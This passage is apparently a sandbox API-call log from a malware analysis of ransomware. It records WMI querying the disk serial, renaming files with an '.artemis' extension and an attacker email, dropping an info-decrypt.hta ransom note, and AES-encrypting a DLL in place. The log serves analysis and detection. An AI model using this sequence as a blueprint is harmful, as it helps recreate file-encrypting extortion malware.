Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6bce56c | out: ppvObject=0x6bce56c*=0x0) returned 0x80004002 [0174.588] WbemLocator:IUnknown:AddRef (This=0x781fb4) returned 0x3 [0174.589] WbemLocator:IUnknown:QueryInterface (in: This=0x781fb4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6bce0ac | out: ppvObject=0x6bce0ac*=0x0) returned 0x80004002 [0174.589] WbemLocator:IUnknown:QueryInterface (in: This=0x781fb4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6bce05c | out: ppvObject=0x6bce05c*=0x0) returned 0x80004002 [0174.592] WbemLocator:IUnknown:QueryInterface (in: This=0x781fb4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce068 | out: ppvObject=0x6bce068*=0x781f14) returned 0x0 [0174.592] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x781f14, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6bce070 | out: pCid=0x6bce070*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0174.592] WbemLocator:IUnknown:Release (This=0x781f14) returned 0x3 [0174.592] CoGetContextToken (in: pToken=0x6bce0c8 | out: pToken=0x6bce0c8) returned 0x0 [0174.592] CoGetContextToken (in: pToken=0x6bce4d0 | out: pToken=0x6bce4d0) returned 0x0 [0174.592] WbemLocator:IUnknown:QueryInterface (in: This=0x781fb4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce560 | out: ppvObject=0x6bce560*=0x781f9c) returned 0x0 [0174.592] WbemLocator:IRpcOptions:Query (in: This=0x781f9c, pPrx=0x781fb4, dwProperty=2, pdwValue=0x6bce588 | out: pdwValue=0x6bce588) returned 0x80004002 [0174.592] WbemLocator:IUnknown:Release (This=0x781f9c) returned 0x3 [0174.592] WbemLocator:IUnknown:Release (This=0x781fb4) returned 0x2 [0174.592] CoGetContextToken (in: pToken=0x6bceaa8 | out: pToken=0x6bceaa8) returned 0x0 [0174.592] CoGetContextToken (in: pToken=0x6bcea08 | out: pToken=0x6bcea08) returned 0x0 [0174.593] WbemLocator:IUnknown:QueryInterface (in: This=0x781fb4, riid=0x6bcead8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6bcead4 | out: ppvObject=0x6bcead4*=0x6747f4c) returned 0x0 [0174.593] WbemLocator:IUnknown:AddRef (This=0x6747f4c) returned 0x4 [0174.593] WbemLocator:IUnknown:Release (This=0x6747f4c) returned 0x3 [0174.593] WbemLocator:IUnknown:Release (This=0x6747f4c) returned 0x2 [0174.593] SysStringLen (param_1=0x0) returned 0x0 [0174.593] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6733d50, puCount=0x6bcee6c | out: puCount=0x6bcee6c*=0x0) returned 0x0 [0174.593] WbemDefPath:IWbemPath:GetText (in: This=0x6733d50, lFlags=2, puBuffLength=0x6bcee68*=0x0, pszText=0x0 | out: puBuffLength=0x6bcee68*=0x20, pszText=0x0) returned 0x0 [0174.593] WbemDefPath:IWbemPath:GetText (in: This=0x6733d50, lFlags=2, puBuffLength=0x6bcee68*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6bcee68*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0174.593] CoGetContextToken (in: pToken=0x6bcead8 | out: pToken=0x6bcead8) returned 0x0 [0174.593] WbemLocator:IUnknown:AddRef (This=0x781fb4) returned 0x3 [0174.593] WbemLocator:IUnknown:QueryInterface (in: This=0x781fb4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce96c | out: ppvObject=0x6bce96c*=0x781fb4) returned 0x0 [0174.593] WbemLocator:IUnknown:Release (This=0x781fb4) returned 0x3 [0174.593] WbemLocator:IUnknown:Release (This=0x781fb4) returned 0x2 [0174.593] WbemDefPath:IWbemPath:GetText (in: This=0x6733d50, lFlags=2, puBuffLength=0x6bcee70*=0x0, pszText=0x0 | out: puBuffLength=0x6bcee70*=0x20, pszText=0x0) returned 0x0 [0174.593] WbemDefPath:IWbemPath:GetText (in: This=0x6733d50, lFlags=2, puBuffLength=0x6bcee70*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6bcee70*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0174.593] IWbemServices:GetObject (in: This=0x6747f4c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6bcee24*=0x0, ppCallResult=0x0 | out: ppObject=0x6bcee24*=0x673bdf8, ppCallResult=0x0) returned 0x0 [0175.150] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6733dc0, puCount=0x6bcee24 | out: puCount=0x6bcee24*=0x2) returned 0x0 [0175.150] WbemDefPath:IWbemPath:GetText (in: This=0x6733dc0, lFlags=4, puBuffLength=0x6bcee20*=0x0, pszText=0x0 | out: puBuffLength=0x6bcee20*=0xf, pszText=0x0) returned 0x0 [0175.150] WbemDefPath:IWbemPath:GetText (in: This=0x6733dc0, lFlags=4, puBuffLength=0x6bcee20*=0xf, pszText="00000000000000" | out: puBuffLength=0x6bcee20*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0175.150] IWbemClassObject:Get (in: This=0x673bdf8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6bcee20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f5040*=0, plFlavor=0x38f5044*=0 | out: pVal=0x6bcee20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x38f5040*=8, plFlavor=0x38f5044*=0) returned 0x0 [0175.150] SysStringByteLen (bstr="9C354B42") returned 0x10 [0175.150] SysStringByteLen (bstr="9C354B42") returned 0x10 [0175.150] IWbemClassObject:Get (in: This=0x673bdf8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6bcee28*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f5040*=8, plFlavor=0x38f5044*=0 | out: pVal=0x6bcee28*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x38f5040*=8, plFlavor=0x38f5044*=0) returned 0x0 [0175.150] SysStringByteLen (bstr="9C354B42") returned 0x10 [0175.150] SysStringByteLen (bstr="9C354B42") returned 0x10 [0175.151] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\operamail.exe", nBufferLength=0x105, lpBuffer=0x6bcea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\operamail.exe", lpFilePart=0x0) returned 0x2b [0175.151] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\operamail.exe.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x6bcea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\operamail.exe.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x56 [0175.151] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcee88) returned 1 [0175.151] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\operamail.exe" (normalized: "c:\\program files\\common files\\operamail.exe"), fInfoLevelId=0x0, lpFileInformation=0x6bcef04 | out: lpFileInformation=0x6bcef04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcf5b140, ftCreationTime.dwHighDateTime=0x1d5c3fd, ftLastAccessTime.dwLowDateTime=0xa2abb830, ftLastAccessTime.dwHighDateTime=0x1d55efc, ftLastWriteTime.dwLowDateTime=0xa2abb830, ftLastWriteTime.dwHighDateTime=0x1d55efc, nFileSizeHigh=0x0, nFileSizeLow=0x13a00)) returned 1 [0175.151] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcee84) returned 1 [0175.151] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\operamail.exe" (normalized: "c:\\program files\\common files\\operamail.exe"), lpNewFileName="C:\\Program Files\\Common Files\\operamail.exe.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\program files\\common files\\operamail.exe.id-9c354b42.[khalate@tutanota.com].artemis")) returned 1 [0175.152] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcefbc) returned 1 [0175.152] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER", nBufferLength=0x105, lpBuffer=0x6bceac4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\DESIGNER", lpFilePart=0x0) returned 0x26 [0175.152] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\", nBufferLength=0x105, lpBuffer=0x6bcea98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\DESIGNER\\", lpFilePart=0x0) returned 0x27 [0175.152] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\*", lpFindFileData=0x6bcece4 | out: lpFindFileData=0x6bcece4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77b470 [0175.154] FindNextFileW (in: hFindFile=0x77b470, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.154] FindNextFileW (in: hFindFile=0x77b470, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6accc00, ftCreationTime.dwHighDateTime=0x1ca8d25, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc6accc00, ftLastWriteTime.dwHighDateTime=0x1ca8d25, nFileSizeHigh=0x0, nFileSizeLow=0x18340, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSADDNDR.DLL", cAlternateFileName="")) returned 1 [0175.154] FindNextFileW (in: hFindFile=0x77b470, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0175.154] FindClose (in: hFindFile=0x77b470 | out: hFindFile=0x77b470) returned 1 [0175.154] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcef7c) returned 1 [0175.154] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcef88) returned 1 [0175.154] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcefbc) returned 1 [0175.154] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER", nBufferLength=0x105, lpBuffer=0x6bceac4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\DESIGNER", lpFilePart=0x0) returned 0x26 [0175.154] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\", nBufferLength=0x105, lpBuffer=0x6bcea98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\DESIGNER\\", lpFilePart=0x0) returned 0x27 [0175.154] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\*", lpFindFileData=0x6bcece4 | out: lpFindFileData=0x6bcece4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77b470 [0175.155] FindNextFileW (in: hFindFile=0x77b470, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.155] FindNextFileW (in: hFindFile=0x77b470, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6accc00, ftCreationTime.dwHighDateTime=0x1ca8d25, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc6accc00, ftLastWriteTime.dwHighDateTime=0x1ca8d25, nFileSizeHigh=0x0, nFileSizeLow=0x18340, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSADDNDR.DLL", cAlternateFileName="")) returned 1 [0175.155] FindNextFileW (in: hFindFile=0x77b470, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6accc00, ftCreationTime.dwHighDateTime=0x1ca8d25, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc6accc00, ftLastWriteTime.dwHighDateTime=0x1ca8d25, nFileSizeHigh=0x0, nFileSizeLow=0x18340, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSADDNDR.DLL", cAlternateFileName="")) returned 0 [0175.155] FindClose (in: hFindFile=0x77b470 | out: hFindFile=0x77b470) returned 1 [0175.155] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcef7c) returned 1 [0175.155] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcef88) returned 1 [0175.155] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL", nBufferLength=0x105, lpBuffer=0x6bcea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL", lpFilePart=0x0) returned 0x33 [0175.155] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL", nBufferLength=0x105, lpBuffer=0x6bcea74, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL", lpFilePart=0x0) returned 0x33 [0175.155] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6bcea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\DESIGNER\\info-decrypt.hta", lpFilePart=0x0) returned 0x37 [0175.155] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bceedc) returned 1 [0175.155] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\designer\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6bcef58 | out: lpFileInformation=0x6bcef58*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0175.155] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bceed8) returned 1 [0175.155] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL", nBufferLength=0x105, lpBuffer=0x6bcea74, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL", lpFilePart=0x0) returned 0x33 [0175.156] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6bce91c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\DESIGNER\\info-decrypt.hta", lpFilePart=0x0) returned 0x37 [0175.156] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcee10) returned 1 [0175.156] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\designer\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x348 [0175.156] GetFileType (hFile=0x348) returned 0x1 [0175.156] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcee0c) returned 1 [0175.156] GetFileType (hFile=0x348) returned 0x1 [0175.156] WriteFile (in: hFile=0x348, lpBuffer=0x38f7edc*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6bceed4, lpOverlapped=0x0 | out: lpBuffer=0x38f7edc*, lpNumberOfBytesWritten=0x6bceed4*=0x1000, lpOverlapped=0x0) returned 1 [0175.157] WriteFile (in: hFile=0x348, lpBuffer=0x38f7edc*, nNumberOfBytesToWrite=0x557, lpNumberOfBytesWritten=0x6bceea8, lpOverlapped=0x0 | out: lpBuffer=0x38f7edc*, lpNumberOfBytesWritten=0x6bceea8*=0x557, lpOverlapped=0x0) returned 1 [0175.158] CloseHandle (hObject=0x348) returned 1 [0175.158] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL", nBufferLength=0x105, lpBuffer=0x6bce9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL", lpFilePart=0x0) returned 0x33 [0175.158] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bceea4) returned 1 [0175.158] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll"), fInfoLevelId=0x0, lpFileInformation=0x38f8ef8 | out: lpFileInformation=0x38f8ef8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6accc00, ftCreationTime.dwHighDateTime=0x1ca8d25, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc6accc00, ftLastWriteTime.dwHighDateTime=0x1ca8d25, nFileSizeHigh=0x0, nFileSizeLow=0x18340)) returned 1 [0175.361] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bceea0) returned 1 [0177.449] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL", nBufferLength=0x105, lpBuffer=0x6bce8e4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL", lpFilePart=0x0) returned 0x33 [0177.449] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcedd8) returned 1 [0177.449] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x59c [0177.450] GetFileType (hFile=0x59c) returned 0x1 [0177.450] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcedd4) returned 1 [0177.450] GetFileType (hFile=0x59c) returned 0x1 [0177.450] GetFileSize (in: hFile=0x59c, lpFileSizeHigh=0x6bceee0 | out: lpFileSizeHigh=0x6bceee0*=0x0) returned 0x18340 [0186.643] ReadFile (in: hFile=0x59c, lpBuffer=0x45dd2f0, nNumberOfBytesToRead=0x18340, lpNumberOfBytesRead=0x6bcee8c, lpOverlapped=0x0 | out: lpBuffer=0x45dd2f0*, lpNumberOfBytesRead=0x6bcee8c*=0x18340, lpOverlapped=0x0) returned 1 [0186.656] CloseHandle (hObject=0x59c) returned 1 [0186.656] CryptAcquireContextW (in: phProv=0x6bcee2c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6bcee2c*=0x7a8870) returned 1 [0186.658] CryptGenRandom (in: hProv=0x7a8870, dwLen=0x10, pbBuffer=0x34956e0 | out: pbBuffer=0x34956e0) returned 1 [0190.498] CryptImportKey (in: hProv=0x7a8870, pbData=0x349f10c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6bcedfc | out: phKey=0x6bcedfc*=0x77af30) returned 1 [0190.498] CryptContextAddRef (hProv=0x7a8870, pdwReserved=0x0, dwFlags=0x0) returned 1 [0190.498] CryptContextAddRef (hProv=0x7a8870, pdwReserved=0x0, dwFlags=0x0) returned 1 [0190.498] CryptDuplicateKey (in: hKey=0x77af30, pdwReserved=0x0, dwFlags=0x0, phKey=0x6bcedec | out: phKey=0x6bcedec*=0x77aeb0) returned 1 [0190.498] CryptContextAddRef (hProv=0x7a8870, pdwReserved=0x0, dwFlags=0x0) returned 1 [0190.498] CryptSetKeyParam (hKey=0x77aeb0, dwParam=0x4, pbData=0x349f1ec*=0x1, dwFlags=0x0) returned 1 [0190.498] CryptSetKeyParam (hKey=0x77aeb0, dwParam=0x1, pbData=0x349f1b8, dwFlags=0x0) returned 1 [0190.500] CryptEncrypt (in: hKey=0x77aeb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x48395c0*, pdwDataLen=0x6bcee58*=0x18350, dwBufLen=0x18350 | out: pbData=0x48395c0*, pdwDataLen=0x6bcee58*=0x18350) returned 1 [0190.501] CryptEncrypt (in: hKey=0x77aeb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x349f214*, pdwDataLen=0x6bcee60*=0x0, dwBufLen=0x10 | out: pbData=0x349f214*, pdwDataLen=0x6bcee60*=0x10) returned 1 [0190.524] CryptDestroyKey (hKey=0x77af30) returned 1 [0190.524] CryptReleaseContext (hProv=0x7a8870, dwFlags=0x0) returned 1 [0190.524] CryptReleaseContext (hProv=0x7a8870, dwFlags=0x0) returned 1 [0190.524] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL", nBufferLength=0x105, lpBuffer=0x6bce8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL", lpFilePart=0x0) returned 0x33 [0190.524] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcedc4) returned 1 [0190.524] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3dc [0190.525] GetFileType (hFile=0x3dc) returned 0x1 [0190.525] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcedc0) returned 1 [0190.525] GetFileType (hFile=0x3dc) returned 0x1 [0190.525] WriteFile (in: hFile=0x3dc, lpBuffer=0x4871950*, nNumberOfBytesToWrite=0x18560, lpNumberOfBytesWritten=0x6bcee80, lpOverlapped=0x0 | out: lpBuffer=0x4871950*, lpNumberOfBytesWritten=0x6bcee80*=0x18560, lpOverlapped=0x0) returned 1 [0190.528] CloseHandle (hObject=0x3dc) returned 1 [0190.530] CoTaskMemAlloc (cb=0x20c) returned 0x9825530 [0190.530] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x9825530 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0190.530] CoTaskMemFree (pv=0x9825530) [0190.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6bce8b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0190.530] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bcee00 | out: ppv=0x6bcee00*=0x72015c) returned 0x0 [0190.530] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6bcedf8 | out: pAptType=0x6bcedf8*=1) returned 0x0 [0190.530] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6bcedfc | out: ppvObject=0x6bcedfc*=0x0) returned 0x80004002 [0190.530] IUnknown:Release (This=0x72015c) returned 0x1 [0190.531] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bce768 | out: ppv=0x6bce768*=0x6737078) returned 0x0 [0190.532] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737078, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6bce980 | out: ppvObject=0x6bce980*=0x0) returned 0x80004002 [0190.532] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6737078, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce994 | out: ppvObject=0x6bce994*=0x6738460) returned 0x0 [0190.532] WbemDefPath:IUnknown:Release (This=0x6737078) returned 0x0 [0190.532] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, 